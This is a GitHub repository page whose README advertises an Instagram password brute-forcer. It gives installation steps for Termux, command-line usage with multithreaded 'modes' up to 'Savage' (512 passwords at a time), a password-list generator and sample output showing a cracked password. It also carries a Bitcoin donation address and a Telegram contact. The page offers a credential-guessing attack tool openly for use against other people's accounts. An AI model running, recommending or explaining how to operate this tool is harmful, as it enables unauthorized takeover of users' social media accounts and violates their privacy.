Skip to content

Mr-X-01/Insta

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Instagram

Hi, this is a Instagram brute-forcer

Donate

Who does not mind a penny on the development of the project:
Bitcoin: 1LBjGEQ16jK23cVqtkFg5fm91poKVVAP5b

There will be questions - Telegram: @Mrxanon

How to install?

Follow the instructions...
If you have Android - download Termux from Google Play and open it and write the commands below:
apt update
apt upgrade -y
apt install python -y
apt install git -y
git clone https://github.com/Mr-X-01/Insta
cd Instagram
pip3 install -r requirements.txt

How to start?

python3 instagram.py 'username' 'wordlist' -m 'mode'

How to generate passwords?

python Passgen.py

How to unrar?

sudo apt install unrar
sudo yum install unrar
sudo dnf install unrar
unrar e /Insta

Help

python3 instagram.py -h
usage: instagram.py [-h] [-m MODE] username wordlist

positional arguments:
  username              email or username
  wordlist              password list

optional arguments:
  -h, --help            show this help message and exit
  -m MODE, --mode MODE  modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots

Bots(Threads)

  • 4 bots: 64 passwords at a time
  • 8 bots: 128 passwords at a time
  • 16 bots: 256 passwords at a time
  • 32 bots: 512 passwords at a time

Modes

  • 0: 32 bots
  • 1: 16 bots
  • 2: 8 bots
  • 3: 4 bots

Chill mode

This mode uses only 4 bots, or 64 passwords at a time.

python3 instagram.py Mr.x pass.lst -m 3

Moderate mode 1

This mode uses 8 bots, or 128 passwords at a time.

python3 instagram.py Mr.x pass.lst -m 2

Moderate mode 2

This mode uses 16 bots, or 256 passwords at a time.

python3 instagram.py Mr.x pass.lst -m 1

Savage mode

This mode uses 32 bots, or 512 passwords at a time.

python3 instagram.py Mr.x pass.lst -m 0

If you don't specify a mode, then mode is set to 2

Run

[-] Wordlist: pass.lst
[-] Username: Mr.x
[-] Password: 272
[-] Complete: 45.51%
[-] Attempts: 228
[-] Browsers: 273
[-] Exists: True

Stop

[-] Wordlist: pass.lst
[-] Username: Mr.x
[-] Password: mr090
[-] Complete: 62.67%
[-] Attempts: 314
[-] Browsers: 185
[-] Exists: True

[!] Password Found
[+] Username: Mr.x
[+] Password: mr090

About

Insta bruter

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages